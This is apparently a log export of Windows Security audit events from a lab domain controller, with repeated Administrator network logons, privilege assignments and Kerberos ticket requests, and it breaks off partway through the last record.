{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220593,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9BE94\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9be94","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220594,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9BE94\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x9be94","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220595,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220596,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220597,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220598,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9C184\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9c184","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220599,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9C184\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x9c184","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220600,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220601,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220602,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220603,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9C3A4\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{E99C09B0-296B-B0EB-C315-DEAAFD061455}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x9c3a4","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{E99C09B0-296B-B0EB-C315-DEAAFD061455}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220604,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x9C3A4\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x9c3a4","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 